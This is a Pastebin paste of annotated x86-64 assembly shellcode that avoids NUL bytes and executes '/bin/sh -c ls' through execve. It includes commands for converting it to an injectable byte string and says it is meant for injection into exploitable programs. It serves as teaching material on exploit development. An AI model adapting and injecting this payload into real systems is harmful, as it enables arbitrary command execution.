Advertisement
MichaelPetch

shellcode2

Oct 18th, 2020 (edited)
302
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.27 KB | None | 0 0
  1. # This shell code program could be converted to a C style string using:
  2. #
  3. # as --64 shellcode.s -o shellcode.o
  4. # ld shellcode.o -o shellcode
  5. # objcopy -j.text -O binary shellcode shellcode.bin
  6. # hexdump -v -e '"\\""x" 1/1 "%02x" ""' shellcode.bin
  7.  
  8. # This shell code program can't be run directly but it will operate as shellcode
  9. # once converted to a string and injected into an exploitable program. This code
  10. # is designed to avoid any NUL(0x00) byte characters being generated.
  11.  
  12. .section .text
  13. .globl _start
  14. _start:
  15. jmp overdata # Mix code and DATA in same segment
  16.  
  17. # Generate all the strings without a NUL(0) byte. We will replace the 0xff with 0x00 in the code
  18. name:.ascii "/bin/sh" # Program to run
  19. name_nul: .byte 0xff # This 0xff will be replaced by 0x00 in the code
  20. arg1:.ascii "-c" # Program argument
  21. arg1_nul: .byte 0xff # This 0xff will be replaced by 0x00 in the code
  22. arg2:.ascii "ls" # Program Argument
  23. arg2_nul: .byte 0xff # This 0xff will be replaced by 0x00 in the code
  24.  
  25. overdata:
  26. xor %eax, %eax # RAX = 0
  27.  
  28. # All references to the data before our code will use a negative offset from RIP
  29. # and use a 1 byte displacement. This avoids producing unwanted NUL(0) characters in the
  30. # code. We use RIP relative addressing so the codewill be position independent
  31. # once loaded in memory.
  32.  
  33. # Zero terminate each of the strings
  34. mov %al, arg2_nul(%rip)
  35. mov %al, arg1_nul(%rip)
  36. mov %al, name_nul(%rip)
  37.  
  38. lea name(%rip), %rdi # RDI = pointer to program name string
  39.  
  40. push %rax # NULL terminate the program argument array
  41. leaq arg2(%rip), %rsi
  42. push %rsi # Push the address of the 3rd program argument on stack
  43. lea arg1(%rip), %rsi
  44. push %rsi # Push the address of the 2nd program argument on stack
  45. push %rdi # Push the address of the program name on stack as 1st argument
  46. mov %rsp, %rsi # RSI = Pointer to the program argument array
  47.  
  48. mov %rax, %rdx # RDX = 0 = NULL envp parameter
  49.  
  50. mov $59, %al # RAX = execve system call number
  51.  
  52. syscall
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement